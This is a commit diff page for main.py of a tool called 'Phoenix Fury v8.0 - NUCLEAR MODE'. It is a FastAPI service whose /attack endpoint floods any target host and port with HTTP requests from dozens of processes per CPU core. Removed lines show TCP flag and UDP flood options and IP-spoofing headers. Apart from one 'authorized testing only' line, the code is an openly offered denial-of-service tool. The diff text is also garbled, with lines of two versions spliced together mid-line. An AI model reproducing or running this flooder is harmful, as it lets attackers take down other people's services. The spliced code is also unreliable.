Samuraiog commited on
Commit
8ce488b
·
verified ·
1 Parent(s): 4c33e93

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +364 -117
main.py CHANGED
@@ -1,250 +1,497 @@
1
- import multiprocessing
2
 
3
- import socketimport threading
4
 
5
- import multiprocessingimport asyncio
6
 
7
- import timeimport aiohttp
8
 
9
- import osimport os
10
-
11
- from ctypes import c_ulonglongimport sys
12
 
13
- from fastapi import FastAPI, BackgroundTasksimport psutil
14
 
15
- from pydantic import BaseModelimport ssl
16
 
17
- import uvicornfrom typing import Literal, List, Union
18
 
19
- from ctypes import c_ulonglong
20
 
21
  app = FastAPI(title="Phoenix Fury v8.0 - NUCLEAR MODE")
22
 
23
- # Use uvloop for a significant performance boost
24
 
25
- # ============================================================================try:
26
 
27
- # AUTO-CONFIG: USE ALL AVAILABLE RESOURCES import uvloop
28
 
29
- # ============================================================================ asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
30
 
31
- CPU_COUNT = os.cpu_count() or 8except ImportError:
32
 
33
- # NUCLEAR MODE: 64 processes per CPU core! pass
34
 
35
- TOTAL_PROCESSES = CPU_COUNT * 64 # 48 cores = 3,072 processes
36
 
37
- REQUESTS_PER_BURST = 1000 # Each process sends 1000 reqs per connectionfrom fastapi import FastAPI, HTTPException, BackgroundTasks
38
 
39
- from pydantic import BaseModel, Field
40
 
41
- print(f"[NUCLEAR MODE] {CPU_COUNT} cores detected")import uvicorn
42
 
43
- print(f"[NUCLEAR MODE] Spawning {TOTAL_PROCESSES} attack processes")
44
 
45
- print(f"[NUCLEAR MODE] Expected: {TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,} RPS")# --- Application Setup ---
46
 
47
- app = FastAPI(
48
 
49
- # ============================================================================ title="🔥 Phoenix Fury API v7.0 - MAXIMUM POWER Edition",
50
 
51
- # MODELS description="Extreme stress testing tool with auto-optimized settings for maximum RPS/PPS. For authorized testing only.",
52
 
53
- # ============================================================================ version="7.0.0"
54
 
55
- class AttackConfig(BaseModel):)
56
 
57
  target: str
58
 
59
- port: int = 80# --- Auto-Optimized Configuration ---
60
 
61
- duration: int = 60CPU_COUNT = psutil.cpu_count(logical=True) or 8
62
 
63
- TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
64
 
65
  # ============================================================================
66
 
67
- # ULTRA-AGGRESSIVE WORKER - MAXIMUM SPEED# REALISTIC CONFIG - Fewer processes that actually work
68
 
69
- # ============================================================================def calculate_optimal_config():
70
 
71
- def nuclear_worker(worker_id, target_ip, port, stop_flag, counter): """Calculate reasonable process count."""
72
 
73
- """ # MUCH FEWER processes - focus on making them work!
74
 
75
- Ultra-aggressive worker: tight loop, no error handling, maximum speed. if CPU_COUNT >= 32:
76
 
77
- """ MAX_PROCESSES = CPU_COUNT * 2 # 64-96 processes for 32-48 cores
78
 
79
- # Pre-build request (minimal) elif CPU_COUNT >= 16:
80
 
81
- request = f"GET /?w={worker_id}&c={{}} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n".encode() MAX_PROCESSES = CPU_COUNT * 3 # 48 processes for 16 cores
82
 
83
- elif CPU_COUNT >= 8:
84
 
85
- local_count = 0 MAX_PROCESSES = CPU_COUNT * 4 # 32 processes for 8 cores
86
 
87
- req_num = 0 elif CPU_COUNT >= 4:
88
 
89
- MAX_PROCESSES = CPU_COUNT * 6 # 24 processes for 4 cores
90
 
91
- # INFINITE LOOP: Connect → Blast requests → Reconnect else:
92
 
93
- while not stop_flag.value: MAX_PROCESSES = CPU_COUNT * 8 # 16 processes for 2 cores
94
 
95
- sock = None
96
 
97
- try: REQUESTS_PER_CONNECTION = 500 # Send 500 requests per socket
98
 
99
- # Fast socket creation total_capacity = MAX_PROCESSES * REQUESTS_PER_CONNECTION
100
 
101
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
102
 
103
- sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) return MAX_PROCESSES, REQUESTS_PER_CONNECTION, total_capacity
104
 
105
  sock.settimeout(2)
106
 
107
- sock.connect((target_ip, port))MAX_PROCESSES, MAX_CONCURRENCY_PER_PROCESS, TOTAL_WORKERS = calculate_optimal_config()
108
 
109
- STATS_BATCH_UPDATE_SIZE = 100 # Smaller batches for better feedback
110
 
111
- # BLAST REQUESTS - No delays, no checks
112
 
113
- for _ in range(REQUESTS_PER_BURST):# --- L7 Enhanced Headers Pool ---
114
 
115
- try:USER_AGENTS = [
116
 
117
- sock.send(request.replace(b"{}", str(req_num).encode())) "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
118
 
119
- local_count += 1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/537.36",
120
 
121
- req_num += 1 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
122
 
123
- except: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
124
 
125
- break "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1"
126
 
127
- ]
128
 
129
- sock.close()REFERERS = [
130
 
131
- except: "https://www.google.com/search?q=",
132
 
133
- pass # Ignore ALL errors, keep going "https://www.bing.com/search?q=",
134
 
135
- "https://www.facebook.com/",
136
 
137
- # Update shared counter every 500 requests "https://www.twitter.com/",
138
 
139
- if local_count >= 500: "https://www.reddit.com/",
140
 
141
- counter.value += local_count "https://www.youtube.com/"
142
 
143
- local_count = 0]
144
 
145
 
146
 
147
- # Final updatedef get_random_headers() -> dict:
 
 
148
 
149
- if local_count > 0: """Generates randomized headers with IP spoofing for L7 attacks."""
150
 
151
- counter.value += local_count return {
152
 
153
- "User-Agent": random.choice(USER_AGENTS),
154
 
155
- # ============================================================================ "Referer": random.choice(REFERERS) + str(random.randint(1000, 9999)),
156
 
157
- # ATTACK MANAGER "X-Forwarded-For": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
158
 
159
- # ============================================================================ "X-Real-IP": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
160
 
161
- class NuclearAttackManager: "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
162
 
163
- def __init__(self): "Accept-Language": "en-US,en;q=0.9",
164
 
165
- self.active = False "Accept-Encoding": "gzip, deflate, br",
166
 
167
- self.processes = [] "Cache-Control": "no-cache",
168
 
169
- self.stop_flag = multiprocessing.Value('i', 0) "Pragma": "no-cache"
170
 
171
- self.counter = multiprocessing.Value(c_ulonglong, 0) }
172
 
173
  self.start_time = 0
174
 
175
- # ====================================================================================
176
 
177
- def launch(self, target: str, port: int, duration: int):# Pydantic API Models (Simplified - Auto Max Settings)
178
 
179
- """Launch nuclear attack with ALL processes."""# ====================================================================================
180
 
181
- if self.active:class BaseAttackConfig(BaseModel):
182
 
183
- return target: str = Field(..., description="Target hostname or IP address")
184
 
185
- port: int = Field(..., ge=1, le=65535, description="Target port")
186
 
187
- self.active = True duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds")
188
 
189
  self.stop_flag.value = 0
190
 
191
- self.counter.value = 0class L4TCPConfig(BaseAttackConfig):
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
192
 
193
- self.start_time = time.time() method: Literal["syn", "ack", "fin", "rst", "psh", "urg"] = Field("syn", description="TCP flag for the attack")
194
 
195
- self.processes = []
196
 
197
- class L4UDPConfig(BaseAttackConfig):
198
 
199
  # Resolve target method: Literal["flood", "pps"] = Field("flood", description="'flood' for large packets, 'pps' for minimal packets")
200
 
201
- try: payload_size: int = Field(1400, ge=0, le=1472, description="Size of UDP payload. 0 for PPS mode.")
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
202
 
203
- target_ip = socket.gethostbyname(target.replace("http://", "").replace("https://", "").split("/")[0])
204
 
205
- except:class L7Config(BaseAttackConfig):
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
206
 
207
- target_ip = target method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
208
 
209
- path: str = Field("/", description="Request path")
210
 
211
- print(f"\n{'='*70}")
212
 
213
- print(f"🔥 NUCLEAR ATTACK LAUNCHED")class StatusResponse(BaseModel):
214
 
215
- print(f" Target: {target_ip}:{port}") attack_active: bool
216
 
217
- print(f" Processes: {TOTAL_PROCESSES:,}") attack_type: str
218
 
219
- print(f" Duration: {duration}s") target_host: str
220
 
221
- print(f"{'='*70}\n") target_ip: str
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
222
 
223
- port: int
224
 
225
- # Spawn ALL processes at once duration: int
226
 
227
- for i in range(TOTAL_PROCESSES): elapsed_time: float
228
 
229
- p = multiprocessing.Process( processes: int
230
 
231
- target=nuclear_worker, total_sent: int
232
 
233
- args=(i, target_ip, port, self.stop_flag, self.counter) current_rate_pps_rps: float
234
 
235
- ) cpu_usage_percent: float
236
 
237
- p.start() memory_usage_percent: float
238
 
239
- self.processes.append(p)
240
 
241
- # ====================================================================================
242
 
243
- # Stats reporter# CORE NETWORKING & PACKET CRAFTING
244
 
245
- def report_stats():# ====================================================================================
246
 
247
- last_count = 0def check_root() -> bool:
248
 
249
  last_time = time.time() """Check if running with root/admin privileges."""
250
 
 
1
+ import multiprocessingimport multiprocessing
2
 
3
+ import socket
4
 
5
+ import timeimport socketimport threading
6
 
7
+ import os
8
 
9
+ from ctypes import c_ulonglongimport multiprocessingimport asyncio
 
 
10
 
11
+ from fastapi import FastAPI, BackgroundTasks
12
 
13
+ from pydantic import BaseModelimport timeimport aiohttp
14
 
15
+ import uvicorn
16
 
17
+ import osimport os
18
 
19
  app = FastAPI(title="Phoenix Fury v8.0 - NUCLEAR MODE")
20
 
21
+ from ctypes import c_ulonglongimport sys
22
 
23
+ # ============================================================================
24
 
25
+ # AUTO-CONFIG: USE ALL AVAILABLE RESOURCESfrom fastapi import FastAPI, BackgroundTasksimport psutil
26
 
27
+ # ============================================================================
28
 
29
+ CPU_COUNT = os.cpu_count() or 8from pydantic import BaseModelimport ssl
30
 
31
+ # NUCLEAR MODE: 64 processes per CPU core!
32
 
33
+ TOTAL_PROCESSES = CPU_COUNT * 64 # 48 cores = 3,072 processesimport uvicornfrom typing import Literal, List, Union
34
 
35
+ REQUESTS_PER_BURST = 1000 # Each process sends 1000 reqs per connection
36
 
37
+ from ctypes import c_ulonglong
38
 
39
+ print(f"[NUCLEAR MODE] {CPU_COUNT} cores detected")
40
 
41
+ print(f"[NUCLEAR MODE] Spawning {TOTAL_PROCESSES} attack processes")app = FastAPI(title="Phoenix Fury v8.0 - NUCLEAR MODE")
42
 
43
+ print(f"[NUCLEAR MODE] Expected: {TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,} RPS")
44
 
45
+ # Use uvloop for a significant performance boost
46
 
47
+ # ============================================================================
48
 
49
+ # MODELS# ============================================================================try:
50
 
51
+ # ============================================================================
52
 
53
+ class AttackConfig(BaseModel):# AUTO-CONFIG: USE ALL AVAILABLE RESOURCES import uvloop
54
 
55
  target: str
56
 
57
+ port: int = 80# ============================================================================ asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
58
 
59
+ duration: int = 60
60
 
61
+ CPU_COUNT = os.cpu_count() or 8except ImportError:
62
 
63
  # ============================================================================
64
 
65
+ # ULTRA-AGGRESSIVE WORKER - MAXIMUM SPEED# NUCLEAR MODE: 64 processes per CPU core! pass
66
 
67
+ # ============================================================================
68
 
69
+ def nuclear_worker(worker_id, target_ip, port, stop_flag, counter):TOTAL_PROCESSES = CPU_COUNT * 64 # 48 cores = 3,072 processes
70
 
71
+ """
72
 
73
+ Ultra-aggressive worker: tight loop, no error handling, maximum speed.REQUESTS_PER_BURST = 1000 # Each process sends 1000 reqs per connectionfrom fastapi import FastAPI, HTTPException, BackgroundTasks
74
 
75
+ """
76
 
77
+ # Pre-build request (minimal)from pydantic import BaseModel, Field
78
 
79
+ request = f"GET /?w={worker_id}&c={{}} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n".encode()
80
 
81
+ print(f"[NUCLEAR MODE] {CPU_COUNT} cores detected")import uvicorn
82
 
83
+ local_count = 0
84
 
85
+ req_num = 0print(f"[NUCLEAR MODE] Spawning {TOTAL_PROCESSES} attack processes")
86
 
87
+
88
 
89
+ # INFINITE LOOP: Connect → Blast requests → Reconnectprint(f"[NUCLEAR MODE] Expected: {TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,} RPS")# --- Application Setup ---
90
 
91
+ while not stop_flag.value:
92
 
93
+ sock = Noneapp = FastAPI(
94
 
95
+ try:
96
 
97
+ # Fast socket creation# ============================================================================ title="🔥 Phoenix Fury API v7.0 - MAXIMUM POWER Edition",
98
 
99
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
100
 
101
+ sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)# MODELS description="Extreme stress testing tool with auto-optimized settings for maximum RPS/PPS. For authorized testing only.",
102
 
103
  sock.settimeout(2)
104
 
105
+ sock.connect((target_ip, port))# ============================================================================ version="7.0.0"
106
 
107
+
108
 
109
+ # BLAST REQUESTS - No delays, no checksclass AttackConfig(BaseModel):)
110
 
111
+ for _ in range(REQUESTS_PER_BURST):
112
 
113
+ try: target: str
114
 
115
+ sock.send(request.replace(b"{}", str(req_num).encode()))
116
 
117
+ local_count += 1 port: int = 80# --- Auto-Optimized Configuration ---
118
 
119
+ req_num += 1
120
 
121
+ except: duration: int = 60CPU_COUNT = psutil.cpu_count(logical=True) or 8
122
 
123
+ break
124
 
125
+ TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
126
 
127
+ sock.close()
128
 
129
+ except:# ============================================================================
130
 
131
+ pass # Ignore ALL errors, keep going
132
 
133
+ # ULTRA-AGGRESSIVE WORKER - MAXIMUM SPEED# REALISTIC CONFIG - Fewer processes that actually work
134
 
135
+ # Update shared counter every 500 requests
136
 
137
+ if local_count >= 500:# ============================================================================def calculate_optimal_config():
138
 
139
+ counter.value += local_count
140
 
141
+ local_count = 0def nuclear_worker(worker_id, target_ip, port, stop_flag, counter): """Calculate reasonable process count."""
142
 
143
 
144
 
145
+ # Final update """ # MUCH FEWER processes - focus on making them work!
146
+
147
+ if local_count > 0:
148
 
149
+ counter.value += local_count Ultra-aggressive worker: tight loop, no error handling, maximum speed. if CPU_COUNT >= 32:
150
 
 
151
 
 
152
 
153
+ # ============================================================================ """ MAX_PROCESSES = CPU_COUNT * 2 # 64-96 processes for 32-48 cores
154
 
155
+ # ATTACK MANAGER
156
 
157
+ # ============================================================================ # Pre-build request (minimal) elif CPU_COUNT >= 16:
158
 
159
+ class NuclearAttackManager:
160
 
161
+ def __init__(self): request = f"GET /?w={worker_id}&c={{}} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n".encode() MAX_PROCESSES = CPU_COUNT * 3 # 48 processes for 16 cores
162
 
163
+ self.active = False
164
 
165
+ self.processes = [] elif CPU_COUNT >= 8:
166
 
167
+ self.stop_flag = multiprocessing.Value('i', 0)
168
 
169
+ self.counter = multiprocessing.Value(c_ulonglong, 0) local_count = 0 MAX_PROCESSES = CPU_COUNT * 4 # 32 processes for 8 cores
170
 
171
  self.start_time = 0
172
 
173
+ req_num = 0 elif CPU_COUNT >= 4:
174
 
175
+ def launch(self, target: str, port: int, duration: int):
176
 
177
+ """Launch nuclear attack with ALL processes.""" MAX_PROCESSES = CPU_COUNT * 6 # 24 processes for 4 cores
178
 
179
+ if self.active:
180
 
181
+ return # INFINITE LOOP: Connect Blast requests Reconnect else:
182
 
183
+
184
 
185
+ self.active = True while not stop_flag.value: MAX_PROCESSES = CPU_COUNT * 8 # 16 processes for 2 cores
186
 
187
  self.stop_flag.value = 0
188
 
189
+ self.counter.value = 0 sock = None
190
+
191
+ self.start_time = time.time()
192
+
193
+ self.processes = [] try: REQUESTS_PER_CONNECTION = 500 # Send 500 requests per socket
194
+
195
+
196
+
197
+ # Resolve target # Fast socket creation total_capacity = MAX_PROCESSES * REQUESTS_PER_CONNECTION
198
+
199
+ try:
200
+
201
+ target_ip = socket.gethostbyname(target.replace("http://", "").replace("https://", "").split("/")[0]) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
202
+
203
+ except:
204
+
205
+ target_ip = target sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) return MAX_PROCESSES, REQUESTS_PER_CONNECTION, total_capacity
206
+
207
+
208
+
209
+ print(f"\n{'='*70}") sock.settimeout(2)
210
+
211
+ print(f"🔥 NUCLEAR ATTACK LAUNCHED")
212
+
213
+ print(f" Target: {target_ip}:{port}") sock.connect((target_ip, port))MAX_PROCESSES, MAX_CONCURRENCY_PER_PROCESS, TOTAL_WORKERS = calculate_optimal_config()
214
+
215
+ print(f" Processes: {TOTAL_PROCESSES:,}")
216
+
217
+ print(f" Duration: {duration}s") STATS_BATCH_UPDATE_SIZE = 100 # Smaller batches for better feedback
218
+
219
+ print(f"{'='*70}\n")
220
+
221
+ # BLAST REQUESTS - No delays, no checks
222
+
223
+ # Spawn ALL processes at once
224
+
225
+ for i in range(TOTAL_PROCESSES): for _ in range(REQUESTS_PER_BURST):# --- L7 Enhanced Headers Pool ---
226
+
227
+ p = multiprocessing.Process(
228
+
229
+ target=nuclear_worker, try:USER_AGENTS = [
230
+
231
+ args=(i, target_ip, port, self.stop_flag, self.counter)
232
+
233
+ ) sock.send(request.replace(b"{}", str(req_num).encode())) "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
234
+
235
+ p.start()
236
+
237
+ self.processes.append(p) local_count += 1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/537.36",
238
+
239
+
240
+
241
+ # Stats reporter req_num += 1 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
242
+
243
+ def report_stats():
244
+
245
+ last_count = 0 except: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
246
+
247
+ last_time = time.time()
248
+
249
+ break "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1"
250
+
251
+ while not self.stop_flag.value:
252
+
253
+ time.sleep(2) ]
254
+
255
+ now = time.time()
256
+
257
+ current = self.counter.value sock.close()REFERERS = [
258
+
259
+ rps = (current - last_count) / (now - last_time)
260
+
261
+ elapsed = now - self.start_time except: "https://www.google.com/search?q=",
262
+
263
+
264
+
265
+ print(f"[{elapsed:.0f}s] Total: {current:,} | Current RPS: {rps:,.0f}") pass # Ignore ALL errors, keep going "https://www.bing.com/search?q=",
266
+
267
+
268
+
269
+ last_count = current "https://www.facebook.com/",
270
+
271
+ last_time = now
272
+
273
+ # Update shared counter every 500 requests "https://www.twitter.com/",
274
+
275
+ import threading
276
+
277
+ stats_thread = threading.Thread(target=report_stats, daemon=True) if local_count >= 500: "https://www.reddit.com/",
278
+
279
+ stats_thread.start()
280
+
281
+ counter.value += local_count "https://www.youtube.com/"
282
+
283
+ # Auto-stop after duration
284
+
285
+ def auto_stop(): local_count = 0]
286
+
287
+ time.sleep(duration)
288
+
289
+ self.terminate()
290
+
291
+
292
+
293
+ stop_thread = threading.Thread(target=auto_stop, daemon=True) # Final updatedef get_random_headers() -> dict:
294
+
295
+ stop_thread.start()
296
+
297
+ if local_count > 0: """Generates randomized headers with IP spoofing for L7 attacks."""
298
+
299
+ def terminate(self):
300
+
301
+ """Stop all processes.""" counter.value += local_count return {
302
+
303
+ if not self.active:
304
+
305
+ return "User-Agent": random.choice(USER_AGENTS),
306
+
307
+
308
+
309
+ print("\n⚠️ Terminating attack...")# ============================================================================ "Referer": random.choice(REFERERS) + str(random.randint(1000, 9999)),
310
+
311
+ self.stop_flag.value = 1
312
+
313
+ # ATTACK MANAGER "X-Forwarded-For": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
314
+
315
+ # Give processes 3 seconds to finish
316
+
317
+ time.sleep(3)# ============================================================================ "X-Real-IP": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
318
+
319
+
320
+
321
+ # Force kill remainingclass NuclearAttackManager: "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
322
+
323
+ for p in self.processes:
324
+
325
+ if p.is_alive(): def __init__(self): "Accept-Language": "en-US,en;q=0.9",
326
+
327
+ p.terminate()
328
+
329
+ self.active = False "Accept-Encoding": "gzip, deflate, br",
330
+
331
+ # Wait for all to die
332
+
333
+ for p in self.processes: self.processes = [] "Cache-Control": "no-cache",
334
+
335
+ p.join(timeout=1)
336
+
337
+ self.stop_flag = multiprocessing.Value('i', 0) "Pragma": "no-cache"
338
+
339
+ # Final stats
340
+
341
+ elapsed = time.time() - self.start_time self.counter = multiprocessing.Value(c_ulonglong, 0) }
342
+
343
+ total = self.counter.value
344
+
345
+ avg_rps = total / elapsed if elapsed > 0 else 0 self.start_time = 0
346
+
347
+
348
+
349
+ print(f"\n{'='*70}") # ====================================================================================
350
+
351
+ print(f"✅ ATTACK COMPLETED")
352
+
353
+ print(f" Total Requests: {total:,}") def launch(self, target: str, port: int, duration: int):# Pydantic API Models (Simplified - Auto Max Settings)
354
+
355
+ print(f" Duration: {elapsed:.2f}s")
356
+
357
+ print(f" Average RPS: {avg_rps:,.2f}") """Launch nuclear attack with ALL processes."""# ====================================================================================
358
+
359
+ print(f"{'='*70}\n")
360
+
361
+ if self.active:class BaseAttackConfig(BaseModel):
362
+
363
+ self.active = False
364
+
365
+ self.processes = [] return target: str = Field(..., description="Target hostname or IP address")
366
+
367
+
368
+
369
+ # Global manager port: int = Field(..., ge=1, le=65535, description="Target port")
370
+
371
+ ATTACK_MANAGER = NuclearAttackManager()
372
+
373
+ self.active = True duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds")
374
+
375
+ # ============================================================================
376
+
377
+ # API ENDPOINTS self.stop_flag.value = 0
378
+
379
+ # ============================================================================
380
+
381
+ @app.get("/") self.counter.value = 0class L4TCPConfig(BaseAttackConfig):
382
+
383
+ def root():
384
+
385
+ return { self.start_time = time.time() method: Literal["syn", "ack", "fin", "rst", "psh", "urg"] = Field("syn", description="TCP flag for the attack")
386
+
387
+ "name": "Phoenix Fury v8.0 - NUCLEAR MODE",
388
+
389
+ "processes": TOTAL_PROCESSES, self.processes = []
390
 
391
+ "cpu_cores": CPU_COUNT,
392
 
393
+ "status": "READY" if not ATTACK_MANAGER.active else "ATTACKING" class L4UDPConfig(BaseAttackConfig):
394
 
395
+ }
396
 
397
  # Resolve target method: Literal["flood", "pps"] = Field("flood", description="'flood' for large packets, 'pps' for minimal packets")
398
 
399
+ @app.post("/attack")
400
+
401
+ def start_attack(config: AttackConfig, background: BackgroundTasks): try: payload_size: int = Field(1400, ge=0, le=1472, description="Size of UDP payload. 0 for PPS mode.")
402
+
403
+ """Launch nuclear L7 attack."""
404
+
405
+ if ATTACK_MANAGER.active: target_ip = socket.gethostbyname(target.replace("http://", "").replace("https://", "").split("/")[0])
406
+
407
+ return {"error": "Attack already in progress"}
408
+
409
+ except:class L7Config(BaseAttackConfig):
410
+
411
+ background.add_task(
412
+
413
+ ATTACK_MANAGER.launch, target_ip = target method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
414
+
415
+ config.target,
416
+
417
+ config.port, path: str = Field("/", description="Request path")
418
+
419
+ config.duration
420
 
421
+ ) print(f"\n{'='*70}")
422
 
423
+
424
+
425
+ return { print(f"🔥 NUCLEAR ATTACK LAUNCHED")class StatusResponse(BaseModel):
426
+
427
+ "status": "launched",
428
+
429
+ "target": config.target, print(f" Target: {target_ip}:{port}") attack_active: bool
430
+
431
+ "port": config.port,
432
+
433
+ "processes": TOTAL_PROCESSES, print(f" Processes: {TOTAL_PROCESSES:,}") attack_type: str
434
+
435
+ "expected_rps": f"{TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,}"
436
+
437
+ } print(f" Duration: {duration}s") target_host: str
438
+
439
+
440
+
441
+ @app.post("/stop") print(f"{'='*70}\n") target_ip: str
442
 
443
+ def stop_attack():
444
 
445
+ """Stop current attack.""" port: int
446
 
447
+ ATTACK_MANAGER.terminate()
448
 
449
+ return {"status": "stopped"} # Spawn ALL processes at once duration: int
450
 
 
451
 
 
452
 
453
+ @app.get("/status") for i in range(TOTAL_PROCESSES): elapsed_time: float
454
 
455
+ def get_status():
456
+
457
+ """Get current attack status.""" p = multiprocessing.Process( processes: int
458
+
459
+ if not ATTACK_MANAGER.active:
460
+
461
+ return {"active": False} target=nuclear_worker, total_sent: int
462
+
463
+
464
+
465
+ elapsed = time.time() - ATTACK_MANAGER.start_time args=(i, target_ip, port, self.stop_flag, self.counter) current_rate_pps_rps: float
466
+
467
+ total = ATTACK_MANAGER.counter.value
468
+
469
+ current_rps = total / elapsed if elapsed > 0 else 0 ) cpu_usage_percent: float
470
+
471
+
472
 
473
+ return { p.start() memory_usage_percent: float
474
 
475
+ "active": True,
476
 
477
+ "elapsed": round(elapsed, 1), self.processes.append(p)
478
 
479
+ "total_requests": total,
480
 
481
+ "current_rps": round(current_rps, 2), # ====================================================================================
482
 
483
+ "processes": TOTAL_PROCESSES
484
 
485
+ } # Stats reporter# CORE NETWORKING & PACKET CRAFTING
486
 
 
487
 
 
488
 
489
+ if __name__ == "__main__": def report_stats():# ====================================================================================
490
 
491
+ multiprocessing.set_start_method('fork', force=True)
492
 
493
+ uvicorn.run(app, host="0.0.0.0", port=8000, workers=1, log_level="warning") last_count = 0def check_root() -> bool:
494
 
 
495
 
496
  last_time = time.time() """Check if running with root/admin privileges."""
497